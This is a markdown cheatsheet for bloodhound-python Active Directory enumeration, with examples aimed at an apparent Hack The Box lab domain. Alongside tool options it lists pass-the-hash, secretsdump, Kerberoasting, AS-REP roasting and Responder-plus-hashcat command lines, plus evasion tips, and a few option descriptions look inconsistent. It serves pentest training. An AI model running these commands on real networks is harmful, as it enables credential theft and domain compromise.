bloodhound-python.md (22962B)
1 --- 2 title: "BloodHound-Python_" 3 description: "bloodhound-python --help" 4 category: active-directory 5 subcategory: "Tooling & Recon" 6 tags: ["active-directory", "kerberos"] 7 tools: ["Nmap", "NetExec", "Impacket", "BloodHound", "SharpHound"] 8 difficulty: intermediate 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/BloodHound-Python_Cheatsheet.md" 11 --- 12 # ๐ BloodHound-Python Cheatsheet 13 14 > **Complete guide to using bloodhound-python for remote Active Directory enumeration** 15 16 --- 17 18 ## ๐ Table of Contents 19 20 - [Overview](#-overview) 21 - [Installation](#-installation) 22 - [Basic Usage](#-basic-usage) 23 - [Authentication Methods](#-authentication-methods) 24 - [Collection Methods](#-collection-methods) 25 - [Advanced Options](#-advanced-options) 26 - [Output Options](#-output-options) 27 - [Common Usage Scenarios](#-common-usage-scenarios) 28 - [SharpHound Comparison](#-sharphound-comparison) 29 - [Troubleshooting](#-troubleshooting) 30 - [Post-Collection](#-post-collection) 31 32 --- 33 34 ## ๐ฏ Overview 35 36 **bloodhound-python** (also known as **BloodHound.py**) is a Python-based ingestor for BloodHound that allows remote data collection from Active Directory environments without needing to execute code on Windows systems. 37 38 ### Key Features 39 - โ Remote enumeration from Linux 40 - โ No code execution on target required 41 - โ LDAP-based collection 42 - โ Multiple authentication methods 43 - โ Kerberos support 44 - โ Outputs JSON files for BloodHound 45 46 ### When to Use bloodhound-python vs SharpHound 47 48 | Scenario | Tool | 49 |----------|------| 50 | Have valid AD credentials, attacking from Linux | **bloodhound-python** | 51 | Have shell access on Windows machine | **SharpHound** | 52 | Need session enumeration | **SharpHound** | 53 | Remote enumeration only | **bloodhound-python** | 54 | Need local admin rights detection | **SharpHound** | 55 | Stealth is priority (no Windows execution) | **bloodhound-python** | 56 57 --- 58 59 ## ๐ฆ Installation 60 61 ### Kali Linux (Pre-installed) 62 63 ```bash 64 # Usually pre-installed on Kali 65 bloodhound-python --help 66 67 # If not installed 68 sudo apt update 69 sudo apt install bloodhound.py 70 ``` 71 72 ### Manual Installation (pip) 73 74 ```bash 75 # Install via pip 76 pip3 install bloodhound 77 78 # Or install from GitHub (latest version) 79 git clone https://github.com/fox-it/BloodHound.py.git 80 cd BloodHound.py 81 pip3 install . 82 83 # Verify installation 84 bloodhound-python --version 85 ``` 86 87 ### Dependencies 88 89 ```bash 90 # Required dependencies 91 pip3 install dnspython ldap3 impacket 92 93 # For Kerberos support 94 sudo apt install krb5-user 95 pip3 install pyasn1 pyasn1-modules 96 ``` 97 98 --- 99 100 ## ๐ Basic Usage 101 102 ### Standard Execution 103 104 ```bash 105 # Basic enumeration with all collection methods 106 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 107 108 # With automatic ZIP creation 109 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 110 111 # Specify output directory 112 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o /tmp/bloodhound 113 114 # Custom collection name 115 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --collectionmethod all 116 ``` 117 118 ### Essential Parameters 119 120 | Parameter | Description | Example | 121 |-----------|-------------|---------| 122 | `-c, --collectionmethod` | Collection method(s) | `-c all` | 123 | `-u, --username` | Username | `-u judith.mader` | 124 | `-p, --password` | Password | `-p judith09` | 125 | `-d, --domain` | Domain name | `-d certified.htb` | 126 | `-ns, --nameserver` | Domain Controller IP | `-ns 10.10.11.41` | 127 | `-dc, --domain-controller` | DC hostname | `-dc DC01.certified.htb` | 128 129 --- 130 131 ## ๐ Authentication Methods 132 133 ### Method 1: Username & Password 134 135 ```bash 136 # Basic password authentication 137 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 138 139 # With domain prefix 140 bloodhound-python -c all -u certified.htb/judith.mader -p judith09 -ns 10.10.11.41 141 142 # Using domain\username format 143 bloodhound-python -c all -u 'certified.htb\judith.mader' -p judith09 -ns 10.10.11.41 144 ``` 145 146 ### Method 2: NTLM Hash (Pass-the-Hash) 147 148 ```bash 149 # Using NTLM hash 150 bloodhound-python -c all -u judith.mader --hashes :8846f7eaee8fb117ad06bdd830b7586c -d certified.htb -ns 10.10.11.41 151 152 # With LM hash (usually empty) 153 bloodhound-python -c all -u judith.mader --hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d certified.htb -ns 10.10.11.41 154 155 # From secretsdump output 156 bloodhound-python -c all -u administrator --hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 -d certified.htb -ns 10.10.11.41 157 ``` 158 159 ### Method 3: Kerberos Authentication 160 161 ```bash 162 # Using Kerberos ticket 163 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k 164 165 # With ticket cache 166 export KRB5CCNAME=/tmp/judith.ccache 167 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k --kerberos 168 169 # Using AES key 170 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 --aesKey <aes_key> 171 ``` 172 173 ### Method 4: No Password (with .ccache file) 174 175 ```bash 176 # Set Kerberos ticket cache 177 export KRB5CCNAME=/tmp/krb5cc_judith.mader 178 179 # Run without password 180 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k --no-pass 181 ``` 182 183 ### Method 5: Interactive Password Prompt 184 185 ```bash 186 # Prompt for password (more secure, no password in bash history) 187 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 188 # Will prompt: Password: 189 ``` 190 191 --- 192 193 ## ๐ฏ Collection Methods 194 195 ### Available Collection Methods 196 197 | Method | Description | What It Collects | 198 |--------|-------------|------------------| 199 | **all** | All collection methods | Everything below | 200 | **group** | Group memberships | Groups and members | 201 | **localadmin** | Local admin rights | Local admin relationships | 202 | **session** | User sessions | Logged on users | 203 | **trusts** | Domain trusts | Trust relationships | 204 | **default** | Default safe methods | Group, LocalAdmin, Session, Trusts | 205 | **container** | Container info | OUs and Containers | 206 | **psremote** | PSRemote rights | PowerShell remoting access | 207 | **dcom** | DCOM rights | DCOM execution rights | 208 | **rdp** | RDP rights | Remote Desktop access | 209 | **objectprops** | Object properties | Additional AD object properties | 210 | **acl** | ACL enumeration | Access Control Lists | 211 | **loggedon** | Logged on users | Currently logged on users | 212 213 ### Collection Method Usage 214 215 ```bash 216 # All methods (most comprehensive) 217 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 218 219 # Default methods only 220 bloodhound-python -c default -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 221 222 # Specific single method 223 bloodhound-python -c group -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 224 225 # Multiple specific methods 226 bloodhound-python -c group,acl,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 227 228 # All except sessions (less noisy) 229 bloodhound-python -c group,localadmin,trusts,acl,container,objectprops -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 230 ``` 231 232 ### Method Comparison 233 234 ```bash 235 # Quick enumeration (fastest) 236 bloodhound-python -c group,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 237 238 # Comprehensive enumeration (slower but complete) 239 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 240 241 # Stealth enumeration (LDAP only, no SMB) 242 bloodhound-python -c group,acl,objectprops,container,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 243 ``` 244 245 --- 246 247 ## โ๏ธ Advanced Options 248 249 ### Domain Controller Specification 250 251 ```bash 252 # Using IP address (nameserver) 253 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 254 255 # Using hostname (domain controller) 256 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -dc dc01.certified.htb 257 258 # Using FQDN 259 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -dc dc01.certified.htb -ns 10.10.11.41 260 261 # Multiple DCs (will try in order) 262 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41,10.10.11.42 263 ``` 264 265 ### LDAP Configuration 266 267 ```bash 268 # Specify LDAP port (default: 389) 269 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 389 270 271 # Use LDAPS (secure LDAP, port 636) 272 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636 273 274 # Use Global Catalog port 275 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 3268 276 277 # Use GC-SSL 278 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 3269 279 280 # Disable certificate verification (LDAPS) 281 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636 --disable-signing 282 ``` 283 284 ### DNS Configuration 285 286 ```bash 287 # Use custom DNS server 288 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --dns-tcp 289 290 # Force TCP for DNS queries 291 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --dns-tcp 292 293 # Specify DNS timeout 294 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --dns-timeout 5 295 ``` 296 297 ### Global Catalog Options 298 299 ```bash 300 # Use Global Catalog for queries 301 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --global-catalog 302 303 # Specify GC hostname 304 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --gc dc01.certified.htb 305 ``` 306 307 ### Computer/Host Enumeration 308 309 ```bash 310 # Exclude domain controllers from enumeration 311 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --exclude-dcs 312 313 # Custom computer filter (LDAP filter) 314 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --computerfilter "(operatingSystem=*Server*)" 315 316 # Disable computer enumeration (LDAP only) 317 bloodhound-python -c group,acl -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 318 ``` 319 320 --- 321 322 ## ๐ Output Options 323 324 ### Output Directory & Files 325 326 ```bash 327 # Default output (current directory) 328 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 329 330 # Custom output directory 331 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o /tmp/bloodhound_data 332 333 # Specific output directory with ZIP 334 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o /tmp/bh --zip 335 ``` 336 337 ### ZIP File Creation 338 339 ```bash 340 # Automatically create ZIP file 341 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 342 343 # ZIP file will be named: YYYYMMDDHHMMSS_bloodhound.zip 344 ``` 345 346 ### Output Files Generated 347 348 Without `--zip`: 349 ``` 350 20241127163045_computers.json 351 20241127163045_users.json 352 20241127163045_groups.json 353 20241127163045_domains.json 354 20241127163045_gpos.json 355 20241127163045_ous.json 356 20241127163045_containers.json 357 ``` 358 359 With `--zip`: 360 ``` 361 20241127163045_bloodhound.zip (contains all JSON files) 362 ``` 363 364 --- 365 366 ## ๐ฅ Common Usage Scenarios 367 368 ### Scenario 1: Initial Domain Enumeration 369 370 ```bash 371 # Quick initial recon 372 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 373 374 # Save to specific location 375 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o ~/htb/certified/bloodhound --zip 376 ``` 377 378 ### Scenario 2: Stealth Enumeration (LDAP Only) 379 380 ```bash 381 # No SMB connections, LDAP queries only 382 bloodhound-python -c group,acl,objectprops,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 383 384 # Minimize queries 385 bloodhound-python -c group,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 386 ``` 387 388 ### Scenario 3: After Obtaining Hash 389 390 ```bash 391 # Pass-the-hash attack 392 bloodhound-python -c all -u administrator --hashes :32693b11e6aa90eb43d32c72a07ceea6 -d certified.htb -ns 10.10.11.41 --zip 393 394 # After secretsdump 395 impacket-secretsdump certified.htb/judith.mader:judith09@10.10.11.41 396 # Use extracted hash 397 bloodhound-python -c all -u administrator --hashes :32693b11e6aa90eb43d32c72a07ceea6 -d certified.htb -ns 10.10.11.41 --zip 398 ``` 399 400 ### Scenario 4: Multi-Domain Environment 401 402 ```bash 403 # Enumerate parent domain 404 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 405 406 # Enumerate child domain 407 bloodhound-python -c all -u judith.mader -p judith09 -d child.certified.htb -ns 10.10.11.42 --zip 408 409 # Enumerate trusted domain (if creds work) 410 bloodhound-python -c all -u judith.mader -p judith09 -d external.local -ns 10.10.11.50 --zip 411 ``` 412 413 ### Scenario 5: Kerberos Authentication 414 415 ```bash 416 # Get TGT first 417 impacket-getTGT certified.htb/judith.mader:judith09 418 419 # Set ticket cache 420 export KRB5CCNAME=/tmp/judith.mader.ccache 421 422 # Run bloodhound with Kerberos 423 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k --no-pass --zip 424 ``` 425 426 ### Scenario 6: Through SOCKS Proxy 427 428 ```bash 429 # Set up proxy (e.g., with chisel) 430 export HTTP_PROXY=socks5://127.0.0.1:1080 431 export HTTPS_PROXY=socks5://127.0.0.1:1080 432 433 # Or use proxychains 434 proxychains bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 435 ``` 436 437 ### Scenario 7: Limited User Permissions 438 439 ```bash 440 # Low-privilege user - collect what you can 441 bloodhound-python -c group,trusts -u lowpriv -p password123 -d certified.htb -ns 10.10.11.41 --zip 442 443 # Check for interesting group memberships and trusts 444 ``` 445 446 --- 447 448 ## ๐ SharpHound Comparison 449 450 ### Feature Comparison 451 452 | Feature | bloodhound-python | SharpHound | 453 |---------|------------------|------------| 454 | **Platform** | Linux/Remote | Windows/Local | 455 | **Execution** | No code on target | Runs on target | 456 | **Sessions** | โ Limited | โ Full | 457 | **Local Admin** | โ ๏ธ Via LDAP | โ Direct query | 458 | **LDAP Data** | โ Full | โ Full | 459 | **Groups** | โ Full | โ Full | 460 | **ACLs** | โ Full | โ Full | 461 | **GPOs** | โ Full | โ Full | 462 | **Stealth** | โ Better | โ ๏ธ More noisy | 463 | **Speed** | โ ๏ธ Slower | โ Faster | 464 465 ### Command Comparison 466 467 **bloodhound-python:** 468 ```bash 469 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 470 ``` 471 472 **SharpHound equivalent (on Windows as judith.mader):** 473 ```powershell 474 .\SharpHound.exe -c All -d certified.htb --domaincontroller 10.10.11.41 475 ``` 476 477 ### When to Use Each 478 479 **Use bloodhound-python when:** 480 - โ You have valid credentials but no Windows access 481 - โ You want to enumerate remotely from Linux 482 - โ You need stealth (no code execution on target) 483 - โ You're doing initial reconnaissance 484 485 **Use SharpHound when:** 486 - โ You have shell access on Windows 487 - โ You need session enumeration 488 - โ You need local admin detection 489 - โ You want faster/more complete enumeration 490 491 --- 492 493 ## ๐ Troubleshooting 494 495 ### Common Errors & Solutions 496 497 #### Error: "Could not resolve domain" 498 499 ```bash 500 # Solution 1: Add to /etc/hosts 501 echo "10.10.11.41 certified.htb dc01.certified.htb" | sudo tee -a /etc/hosts 502 503 # Solution 2: Use IP instead of hostname 504 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 505 506 # Solution 3: Use DC hostname 507 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -dc dc01.certified.htb -ns 10.10.11.41 508 ``` 509 510 #### Error: "Authentication failed" 511 512 ```bash 513 # Check credentials 514 crackmapexec smb 10.10.11.41 -u judith.mader -p judith09 -d certified.htb 515 516 # Try different username formats 517 bloodhound-python -c all -u 'certified.htb\judith.mader' -p judith09 -ns 10.10.11.41 518 bloodhound-python -c all -u judith.mader@certified.htb -p judith09 -ns 10.10.11.41 519 bloodhound-python -c all -u certified.htb/judith.mader -p judith09 -ns 10.10.11.41 520 521 # Check for account lockout 522 crackmapexec ldap 10.10.11.41 -u judith.mader -p judith09 -d certified.htb 523 ``` 524 525 #### Error: "LDAP connection failed" 526 527 ```bash 528 # Try different LDAP port 529 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 389 530 531 # Try LDAPS 532 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636 533 534 # Disable signing 535 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --disable-signing 536 537 # Check connectivity 538 nmap -p 389,636,3268,3269 10.10.11.41 539 ``` 540 541 #### Error: "DNS resolution failed" 542 543 ```bash 544 # Add DNS server to /etc/resolv.conf 545 echo "nameserver 10.10.11.41" | sudo tee /etc/resolv.conf 546 547 # Use --dns-tcp 548 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --dns-tcp 549 550 # Add domain to /etc/hosts 551 echo "10.10.11.41 certified.htb" | sudo tee -a /etc/hosts 552 ``` 553 554 #### Error: "No output generated" 555 556 ```bash 557 # Check permissions 558 ls -la /tmp 559 560 # Specify output directory 561 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o /tmp/bh 562 563 # Check for errors in output 564 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -v 565 ``` 566 567 #### Error: "Kerberos authentication failed" 568 569 ```bash 570 # Check KRB5CCNAME 571 echo $KRB5CCNAME 572 573 # Verify ticket 574 klist 575 576 # Get fresh ticket 577 impacket-getTGT certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 578 579 # Set correct ticket path 580 export KRB5CCNAME=/tmp/judith.mader.ccache 581 582 # Configure /etc/krb5.conf 583 sudo nano /etc/krb5.conf 584 ``` 585 586 #### Error: "Module not found" 587 588 ```bash 589 # Install dependencies 590 pip3 install bloodhound dnspython ldap3 impacket 591 592 # Or reinstall 593 pip3 install --upgrade bloodhound 594 595 # Check Python path 596 which python3 597 python3 -m site 598 ``` 599 600 --- 601 602 ## ๐ Post-Collection 603 604 ### Verify Output Files 605 606 ```bash 607 # Check generated files 608 ls -lh *bloodhound* *_*.json 609 610 # Verify JSON files 611 for file in *.json; do 612 echo "Checking $file" 613 jq empty "$file" && echo "โ Valid JSON" || echo "โ Invalid JSON" 614 done 615 616 # Count objects in files 617 echo "Users: $(jq '.users | length' *_users.json)" 618 echo "Groups: $(jq '.groups | length' *_groups.json)" 619 echo "Computers: $(jq '.computers | length' *_computers.json)" 620 ``` 621 622 ### Import to BloodHound 623 624 ```bash 625 # Start Neo4j 626 sudo neo4j start 627 628 # Start BloodHound GUI 629 bloodhound 630 631 # Or use bloodhound-import (if available) 632 bloodhound-import -f 20241127163045_bloodhound.zip 633 ``` 634 635 ### Manual ZIP Creation (if needed) 636 637 ```bash 638 # Create ZIP manually 639 zip bloodhound_certified.zip *_computers.json *_users.json *_groups.json *_domains.json *_gpos.json *_ous.json *_containers.json 640 641 # Or use tar 642 tar -czf bloodhound_certified.tar.gz *_*.json 643 ``` 644 645 ### Clean Up 646 647 ```bash 648 # Remove individual JSON files (keep ZIP) 649 rm *_computers.json *_users.json *_groups.json *_domains.json *_gpos.json *_ous.json *_containers.json 650 651 # Remove all BloodHound files 652 rm -f *bloodhound* *_*.json 653 ``` 654 655 --- 656 657 ## ๐ Advanced Techniques 658 659 ### Combining with Other Tools 660 661 ```bash 662 # 1. Enumerate domain users first 663 crackmapexec ldap 10.10.11.41 -u judith.mader -p judith09 -d certified.htb --users 664 665 # 2. Run BloodHound 666 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 667 668 # 3. Enumerate shares 669 crackmapexec smb 10.10.11.41 -u judith.mader -p judith09 -d certified.htb --shares 670 671 # 4. Check for AS-REP roasting 672 impacket-GetNPUsers certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 -request 673 674 # 5. Kerberoasting 675 impacket-GetUserSPNs certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 -request 676 ``` 677 678 ### Automation Script 679 680 ```bash 681 #!/bin/bash 682 # bloodhound_auto.sh 683 684 DOMAIN="certified.htb" 685 DC_IP="10.10.11.41" 686 USERNAME="judith.mader" 687 PASSWORD="judith09" 688 OUTPUT_DIR="/tmp/bloodhound_$(date +%Y%m%d_%H%M%S)" 689 690 echo "[+] Creating output directory: $OUTPUT_DIR" 691 mkdir -p "$OUTPUT_DIR" 692 693 echo "[+] Running BloodHound collection..." 694 bloodhound-python -c all \ 695 -u "$USERNAME" \ 696 -p "$PASSWORD" \ 697 -d "$DOMAIN" \ 698 -ns "$DC_IP" \ 699 -o "$OUTPUT_DIR" \ 700 --zip 701 702 echo "[+] Collection complete!" 703 echo "[+] Output saved to: $OUTPUT_DIR" 704 ls -lh "$OUTPUT_DIR" 705 ``` 706 707 ### Using with Responder/LLMNR Poisoning 708 709 ```bash 710 # 1. Capture credentials with Responder 711 sudo responder -I tun0 -wv 712 713 # 2. Wait for credentials... 714 # [+] Captured NTLMv2 hash: user::domain:hash... 715 716 # 3. Crack the hash 717 hashcat -m 5600 captured.hash /usr/share/wordlists/rockyou.txt 718 719 # 4. Use credentials with BloodHound 720 bloodhound-python -c all -u captured_user -p cracked_pass -d certified.htb -ns 10.10.11.41 --zip 721 ``` 722 723 --- 724 725 ## ๐ก Pro Tips 726 727 1. **Always use --zip** - Makes import to BloodHound cleaner 728 2. **Start with 'all' collection** - Get complete picture first 729 3. **Save output to organized directories** - Use timestamps and target names 730 4. **Add domains to /etc/hosts** - Prevents DNS issues 731 5. **Use pass-the-hash when possible** - Don't crack if you don't need to 732 6. **Combine with other tools** - CME, Impacket suite for comprehensive recon 733 7. **Run multiple times** - User sessions change, run during business hours 734 8. **Document your findings** - Keep track of credentials and paths found 735 9. **Use --exclude-dcs for stealth** - Reduces queries to domain controllers 736 10. **Verify JSON validity** - Check files before importing to BloodHound 737 738 --- 739 740 ## โ ๏ธ Operational Security 741 742 ### Stealth Considerations 743 744 ```bash 745 # Minimal queries (stealthy) 746 bloodhound-python -c group,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 747 748 # Avoid computer enumeration (no SMB connections) 749 bloodhound-python -c group,acl,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 750 751 # Use LDAPS for encryption 752 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636 --zip 753 ``` 754 755 ### Detection Considerations 756 757 **What defenders might see:** 758 - LDAP queries from unusual source 759 - Multiple LDAP binds in short time 760 - Queries for sensitive attributes (adminCount, etc.) 761 - SMB connections for session enumeration 762 763 **Mitigation:** 764 - Use compromised internal system as jump box 765 - Spread out collection over time 766 - Use legitimate admin account if possible 767 - Consider using SharpHound on compromised Windows box instead 768 769 --- 770 771 ## ๐ Useful Resources 772 773 - **BloodHound.py GitHub**: https://github.com/fox-it/BloodHound.py 774 - **BloodHound Documentation**: https://bloodhound.readthedocs.io/ 775 - **BloodHound GUI**: https://github.com/BloodHoundAD/BloodHound 776 - **BloodHound Cypher Queries**: https://github.com/hausec/Bloodhound-Custom-Queries 777 778 --- 779 780 ## ๐ Quick Reference Card 781 782 ```bash 783 # Standard enumeration 784 bloodhound-python -c all -u USER -p PASS -d DOMAIN -ns DC_IP --zip 785 786 # With hash 787 bloodhound-python -c all -u USER --hashes :NTHASH -d DOMAIN -ns DC_IP --zip 788 789 # With Kerberos 790 export KRB5CCNAME=/tmp/ticket.ccache 791 bloodhound-python -c all -u USER -d DOMAIN -ns DC_IP -k --no-pass --zip 792 793 # Stealth mode 794 bloodhound-python -c group,acl,trusts -u USER -p PASS -d DOMAIN -ns DC_IP --zip 795 796 # Custom output 797 bloodhound-python -c all -u USER -p PASS -d DOMAIN -ns DC_IP -o /tmp/bh --zip 798 799 # Through proxy 800 proxychains bloodhound-python -c all -u USER -p PASS -d DOMAIN -ns DC_IP --zip 801 ``` 802 803 --- 804 805 **Created by NetRunner | For Ethical Hacking & Penetration Testing** ๐๐